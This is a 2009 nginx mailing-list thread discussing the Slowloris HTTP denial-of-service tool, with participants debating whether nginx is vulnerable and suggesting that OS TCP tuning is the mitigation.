DoS attack in the wild

Cliff Wells cliff at develix.com
Sat Jun 20 00:52:06 MSD 2009


On Fri, 2009-06-19 at 16:24 -0400, E. Johnson wrote:
> "Welcome to Slowloris - the low bandwidth, yet greedy and poisonous
> HTTP client!"
> 
> 
> http://ha.ckers.org/slowloris/

I've already seen that.   What I'd like to see is what data the OP
extracted from his tests to determine that Nginx is also vulnerable.

Apache and IIS are clearly vulnerable due to their threaded architecture
(they consume a relatively large amount of memory with each connection
which makes this sort of attack easy).   With Nginx this isn't true, so
I suspect the correct place to address resource consumption lies in the
underlying OS' TCP stack settings rather than in nginx.conf (but of
course, I'm willing to stand corrected if the OP's tests showed
otherwise).

In short, the attack effectively simulates what would happen if
thousands of 1200 baud dialup users simultaneously accessed a website.
Nginx should be as close to ideal as you can get for this situation,
provided your OS is properly tuned and has enough resources to handle
that many concurrent connections.

Cliff

> 
> 
> On Fri, Jun 19, 2009 at 4:10 PM, Neelesh Gurjar <neel.hjs at gmail.com>
> wrote:
>         Hello,
>         
>         
>         Can anybody tell how to test DoS attack on webserver please ?
>         
>         
>         Regards
>         NeeleshG
>         
>         
>         On Sat, Jun 20, 2009 at 12:52 AM, Cliff Wells
>         <cliff at develix.com> wrote:
>                 On Fri, 2009-06-19 at 21:45 +0300, luben karavelov
>                 wrote:
>                 > A DoS attack against number of http servers is
>                 available and has hit
>                 > slashdot today:
>                 >
>                 http://it.slashdot.org/story/09/06/19/1243203/Attack-On-a-Significant-Flaw-In-Apache-Released
>                 >
>                 > Out of the box nginx is also vulnerable (I have
>                 tested it on latest 0.7
>                 > installation).
>                 
>                 
>                 What were the results of your tests?   I can see
>                 Apache being vulnerable
>                 to this, given the amount of resources it requires per
>                 connection, but
>                 Nginx should be much less susceptible.   The only
>                 resource I'd expect to
>                 see exhausted might be sockets, which can be tuned at
>                 the OS level.
>                 
>                 Cliff
>                 
>                 --
>                 http://www.google.com/search?q=vonage+sucks
>                 
>                 
>         
>         
>         
>         
>         -- 
>         Regards
>         NeeleshG
>         
>         LINUX is basically a simple operating system, but you have to
>         be a genius to understand the simplicity
>         
> 
-- 
http://www.google.com/search?q=vonage+sucks






More information about the nginx mailing list